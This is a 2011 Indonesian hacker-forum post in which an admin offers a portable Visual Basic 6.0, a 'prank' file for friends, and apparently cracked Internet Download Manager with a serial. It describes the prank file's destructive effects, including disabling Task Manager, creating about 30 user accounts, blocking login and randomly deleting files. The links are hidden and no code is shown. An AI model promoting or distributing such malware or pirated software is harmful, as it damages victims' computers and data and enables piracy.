HaCyCom | Hacker Cyber Community
HaCyCom Forum | Hacker Cyber Community

Langkah-Langkah memasuki Forum :
- Silahkan anda REGISTER terlebih dahulu.
- Jika anda sudah terdaftar silahkan log in.
- Terakhir, Nikmati forum kami sesuka kalian


HaCyCom | Hacker Cyber Community


 
IndeksPortalCalendarGalleryFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 Portable Visual Basic 6.0 + File buat ngerjain teman + portable IDM

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Polmha *H@cK3r*
Admin
Admin
avatar

Jumlah posting : 42
Join date : 25.02.11

PostSubyek: Portable Visual Basic 6.0 + File buat ngerjain teman + portable IDM    Sun Apr 03, 2011 8:14 pm

Ne gw mau beri portable visual basic 6.0
langsung jalanin aja tu file gak pake mbayar , 100%

filenya sekitar 40 MB aja kok . bayangin tu dari sekitar 600 MB jadi 40 MB jadi hemat harddisk.

untuk yang buat ngerjain teman filenya cuma sekitar 0,1 MB , eit tapi bahayanya sangat parah sekali . gw udah coba tu
Ni yang dia lakuin:
-Beri pemberintahuan kalo kita yang salah
-Mouse gerak sendiri / mouse gak mau gerak
-waktu klik ctrl+alt+del (untuk win7) gak ada tulisan start task manager alias gak ada
kalo win xp ato yang lain gw blum tau
-mbuat user yang cukup banyak , sekitar 30 user dengan nama urutan dari 1-30
gambarnya sesuai dengan user yang kita pake
-kalo loe restart / log off / shutdown nti kalo masuk gak mau tampil layernya pake cara
apapun
-sebelum kita restart / log off / shutdown tampilan komputer berubah
-kalo gak direstart / log off / shutdown dalam jangka yang lama , komputer akan
kerestart sendiri
-kadang juga menghapus beberapa file secara acak

NB:kao mau coba sebaiknya pake deep freeze , kalo gak harus install windows lagi / repair komputermu . Inget gw gak tanggung jawab atas apapun yang terjadi .

ni link buat ngerjain temen :
Spoiler:
 

ni link portable VB nya :
Spoiler:
 
ni bunus yaitu portable internet download manger 5.11+serial , maaf kalo versi udh lama ni linknya :
Spoiler:
 

Kembali Ke Atas Go down
Lihat profil user http://polmhabombersms.clubme.net
 
Portable Visual Basic 6.0 + File buat ngerjain teman + portable IDM
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» manga/anime apa sih yg memberi kesan mendalam dan berpengaruh buat hidupkamu?
» pilih ban buat ninja 250 yang oke punya
» (ask) settingan yang pas buat knalpot R9 monza blue
» (ASK) Bensin buat si ninin
» PROJECT VISUAL NOVEL[Need Volunteer]

Permissions in this forum:Anda tidak dapat menjawab topik
HaCyCom | Hacker Cyber Community :: Computing [IT AREA] :: Programming :: Software-
Navigasi: